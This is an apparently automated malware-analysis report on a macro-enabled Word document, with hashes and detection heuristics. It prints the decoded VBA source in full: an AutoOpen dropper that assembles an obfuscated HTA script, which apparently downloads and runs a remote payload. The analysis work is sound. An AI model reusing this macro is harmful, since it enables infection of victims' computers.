Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 304c4ae8ae0b3108…

MALICIOUS

Office (OOXML)

80.1 KB Created: 2021-04-01 07:10:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: e35ef365f5ce89db584db3bdc2704498 SHA-1: b687415cb72b525de3ab608fe9587af9a16240ac SHA-256: 304c4ae8ae0b310883012cfa9cd7bf5d09bff7caac2d403f80e5c56a33da262e
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set memoryTitle = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set memoryTitle = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9239 bytes
SHA-256: ff9e3a847408ca853b914c9c1821f280d088f7c349156a7b98aeed6d8096aa3f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{4D988C7D-95B3-4ED8-927E-C9A82B96FD77}{75ED94AF-374C-42E8-84B3-EF6838DAB870}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function tableGlobal()
With frm.button1
tableGlobal = .Tag
End With
End Function
Function swapTmp()
With frm.button1
swapTmp = .Caption
End With
End Function
Public Sub button1_Click()
Set memoryTitle = CreateObject("wscript.shell")
memoryTitle.exec p(tableGlobal) & " " & p(swapTmp)
End Sub


Attribute VB_Name = "genericButtonConvert"
Sub autoopen()
loadQueryData
End Sub
Function intel(exceptionTitleOption)
intel = "" & exceptionTitleOption & ""
End Function
Sub loadQueryData()
Dim constCollectionWindow As String
constCollectionWindow = p(frm.button1.Caption)
Set libGeneric = New ptrDeleteRequest
libGeneric.refFuncPtr constCollectionWindow, bufConvertCollection
frm.button1_Click
End Sub
Function textboxPtr(tmpProcedure, referenceBufferText, documentCountValue)
textboxPtr = Replace(tmpProcedure, referenceBufferText, documentCountValue)
End Function

Attribute VB_Name = "borderView"
Function counterBufferTemp()
counterBufferTemp = intel("<html><body><div id='content'>fTtlc29sYy53b2RuaVdXd29kbml3OykyIC")
End Function
Function variableScreen()
variableScreen = intel("wiZ3BqLm5pYU1ldGVsZWRcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLn")
End Function
Function textboxDatabase()
textboxDatabase = intel("dvZG5pV1d3b2RuaXc7KXlkb2Jlc25vcHNlci5wbWVUbm9pdHBhYyhldGlydy53b2")
End Function
Function varLocal()
varLocal = intel("RuaVdXd29kbml3OzEgPSBlcHl0LndvZG5pV1d3b2RuaXc7bmVwby53b2RuaVdXd2")
End Function
Function referenceIndex()
referenceIndex = intel("9kbml3OykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHdvZG5pV1")
End Function
Function trustRemove()
trustRemove = intel("d3b2RuaXcgcmF2eykwMDIgPT0gc3V0YXRzLnBtZVRub2l0cGFjKGZpOykoZG5lcy")
End Function
Function loadIndexView()
loadIndexView = intel("5wbWVUbm9pdHBhYzspZXNsYWYgLCIydkl0STU9aGNyYWVzJlhqSGpDUWd4OFNacT")
End Function
Function indexBufException()
indexBufException = intel("E2YW9qRT1lZ2FwJmJ1REpTST1wbXZ3RE9FcVUma2hJRThoWnpnVlBYQ0xWN0I9cF")
End Function
Function dataOption()
dataOption = intel("A4QldsQmJHdT8yMW5heC92dWpXY2RwZlF3cW8vNzI1NjgvQ1hNak9vR1Q0MkNXYk")
End Function
Function exceptionTextboxRepo()
exceptionTextboxRepo = intel("03NnMxY3dER3FTMDlNa25sUXZaL0FGMkRkRlJWeUwxMmcvWnVWdmlUMjkyRG9NSG")
End Function
Function localMainCount()
localMainCount = intel("1mTS80NzUwNC9yVjgvc3l1b2cvbW9jLml4YXQtNjEwMnJlZ3JlYi8vOnB0dGgiIC")
End Function
Function convertRef()
convertRef = intel("wiVEVHIihuZXBvLnBtZVRub2l0cGFjOykicHR0aGxteC4ybG14c20iKHRjZWpiT1")
End Function
Function loadVariable()
loadVariable = intel("hldml0Y0Egd2VuID0gcG1lVG5vaXRwYWMgcmF2|fXspZWNhcHNlbWFOcGF3cyhoY")
End Function
Function removeViewSelect()
removeViewSelect = intel("3RhY307KSJhdGgubmlhTWV0ZWxlZFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZld")
End Function
Function funcArray()
funcArray = intel("GVsZWQudGN1cnRTZWNuZXJlZmVye3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pd")
End Function
Function linkTempW()
linkTempW = intel("HBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHRjdXJ0U2VjbmVyZWZlciByYXY7K")
End Function
Function mainCollectionA()
mainCollectionA = intel("SJncGoubmlhTWV0ZWxlZFxcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51c")
End Function
Function tmpExVb()
tmpExVb = intel("i4pImxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2Vu</div><div id='ta")
End Function
Function countLenScreen()
countLenScreen = intel("ble1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>012345678")
End Function
Function tmpTable()
tmpTable = intel("9+/</div><div id='table3'></div><script language='javascript'>fu")
End Function
Function classMemTitle()
classMemTitle = intel("nction captionBuf(ATempDocument){return(new ActiveXObject(ATempD")
End Function
Function memoryCaption()
memoryCaption = intel("ocument));}function ATmpBorder(textboxLoad){return(counterButton")
End Function
Function convertBufferSelect()
convertBufferSelect = intel("Iterator.getElementById(textboxLoad).innerHTML);}function variab")
End Function
Function loadAConvert()
loadAConvert = intel("leProc(){var requestRequest = ATmpBorder('table1');var tableMemo")
End Function
Function tempVariable()
tempVariable = intel("ry = requestRequest.toLowerCase();var rightLeft = ATmpBorder('ta")
End Function
Function screenFuncScreen()
screenFuncScreen = intel("ble2');return(requestRequest + tableMemory + rightLeft);}functio")
End Function
Function loadWindow()
loadWindow = intel("n selectListbox(s){var e={}; var i; var b=0; var c; var x; var l")
End Function
Function arrayQueryClass()
arrayQueryClass = intel("=0; var a; var linkTitle=''; var w=String.fromCharCode; var L=s.")
End Function
Function rightButton()
rightButton = intel("length;var loadVariableStorage = 'charAt';for(i=0;i<64;i++){e[va")
End Function
Function requestFuncRepo()
requestFuncRepo = intel("riableProc()[loadVariableStorage](i)]=i;}for(x=0;x<L;x++){c=e[s[")
End Function
Function repoDatabaseIndex()
repoDatabaseIndex = intel("loadVariableStorage](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l")
End Function
Function textboxBuffer()
textboxBuffer = intel("-=8))&0xff)||(x<(L-2)))&&(linkTitle+=w(a));}}return(linkTitle);}")
End Function
Function procedureTrustProcedure()
procedureTrustProcedure = intel(";function AView(repoWData){return repoWData.split('').reverse().")
End Function
Function swapGeneric()
swapGeneric = intel("join('');}tableDatabase = window;counterButtonIterator = documen")
End Function
Function screenTitle()
screenTitle = intel("t;tableDatabase.resizeTo(1, 1);tableDatabase.moveTo(-100, -100);")
End Function
Function listGlobalWindow()
listGlobalWindow = intel("var pointerResponseProc = counterButtonIterator.getElementById('")
End Function
Function viewLink()
viewLink = intel("content').innerHTML;var pointerResponseProc = pointerResponsePro")
End Function
Function borderCounterLeft()
borderCounterLeft = intel("c.split('|');var optionBufA = AView(selectListbox(pointerRespons")
End Function
Function bufferConst()
bufferConst = intel("eProc[0]));var lenScreen = AView(selectListbox(pointerResponsePr")
End Function
Function windowLibTrust()
windowLibTrust = intel("oc[1]));</script><script language='javascript'>function swapRefe")
End Function
Function varRefDelete()
varRefDelete = intel("renceTemp(referenceMem){var optionDatabaseTitle = captionBuf('ms")
End Function
Function textStorageLib()
textStorageLib = intel("scriptcontrol.scriptcontrol');optionDatabaseTitle.Language = 'js")
End Function
Function lenSize()
lenSize = intel("cript';optionDatabaseTitle.Timeout = 60000;optionDatabaseTitle.A")
End Function
Function clearListboxClear()
clearListboxClear = intel("ddCode(referenceMem);return(null);}</script><script language='vb")
End Function
Function tableDeleteStorage()
tableDeleteStorage = intel("script'>swapReferenceTemp optionBufA : swapReferenceTemp lenScre")
End Function
Function bufConvert()
bufConvert = intel("en : tableDatabase.close</script></body></html>")
End Function
Function bufConvertCollection()
bufConvertCollection = counterBufferTemp + variableScreen + textboxDatabase + varLocal + referenceIndex + trustRemove + loadIndexView + indexBufException + dataOption + exceptionTextboxRepo + localMainCount + convertRef + loadVariable + removeViewSelect + funcArray + linkTempW + mainCollectionA + tmpExVb + countLenScreen + tmpTable + classMemTitle + memoryCaption + convertBufferSelect + loadAConvert + tempVariable + screenFuncScreen + loadWindow + arrayQueryClass + rightButton + requestFuncRepo + repoDatabaseIndex + textboxBuffer + procedureTrustProcedure + swapGeneric + screenTitle + listGlobalWindow + viewLink + borderCounterLeft + bufferConst + windowLibTrust + varRefDelete + textStorageLib + lenSize + clearListboxClear + tableDeleteStorage + bufConvert
End Function

Attribute VB_Name = "ptrDeleteRequest"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub refFuncPtr(tmpValueStorage As String, exceptionVar As String)
Dim libViewProcedure As FileSystemObject
Set libViewProcedure = New FileSystemObject
Dim storageListbox As TextStream
Set storageListbox = libViewProcedure.CreateTextFile(tmpValueStorage)
storageListbox.WriteLine exceptionVar
storageListbox.Close
Set storageListbox = Nothing
Set libViewProcedure = Nothing
End Sub

Attribute VB_Name = "swapListCollection"
Function p(bufferMem)
p = textboxPtr(bufferMem, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 39936 bytes
SHA-256: 5548036894b1abb279793ad89bf554108c99b7d5102153d8ffdb5c59cd887208

Open this report in the interactive analyzer, or submit your own file for analysis.